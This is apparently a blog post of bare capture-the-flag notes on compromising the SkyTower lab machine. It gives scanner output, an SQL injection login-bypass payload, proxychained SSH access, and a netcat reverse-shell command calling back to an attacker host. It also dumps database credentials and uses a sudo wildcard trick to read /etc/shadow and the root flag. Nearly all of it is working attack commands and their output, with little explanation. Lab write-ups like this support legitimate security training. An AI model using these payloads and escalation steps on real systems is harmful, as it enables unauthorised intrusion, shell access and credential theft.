192.168.1.100
nmap:
80/tcp open http Apache httpd 2.2.22 ((Debian))
3128/tcp open http-proxy Squid http proxy 3.1.20
nikto:
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
gobuster:
/background (Status: 200)
/index (Status: 200)
debian 7
sql injection:
email a’ || 1=1 ;#--
password 123
john@skytech.com
username: john
password: hereisjohn
proxychains:
http 192.168.1.100 3128
ssh:
proxychains ssh john@192.168.1.100 cat /etc/passwd
john:x:1000:1000:john,,,:/home/john:/bin/bash
sara:x:1001:1001:,,,:/home/sara:/bin/bash
william:x:1002:1002:,,,:/home/william:/bin/bash
add key:
proxychains ssh-copy-id john@192.168.1.100
reverse shell:
proxychains ssh john@192.168.1.100 “nc 192.168.1.90 443 -e /bin/bash ”
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
head /var/www/login.php:
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');
mysql -uroot -proot SkyTech -sN -e “select * from login”
1 john@skytech.com hereisjohn
2 sara@skytech.com ihatethisjob
3 william@skytech.com senseable
proxychains ssh-copy-id sara@192.168.1.100
proxychains ssh sara@192.168.1.100 sudo -l
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
proxychains ssh sara@192.168.1.100 “sudo /bin/cat /accounts/* /etc/shadow”
proxychains ssh sara@192.168.1.100 “sudo /bin/cat /accounts/* /root/flag.txt”
No comments:
Post a Comment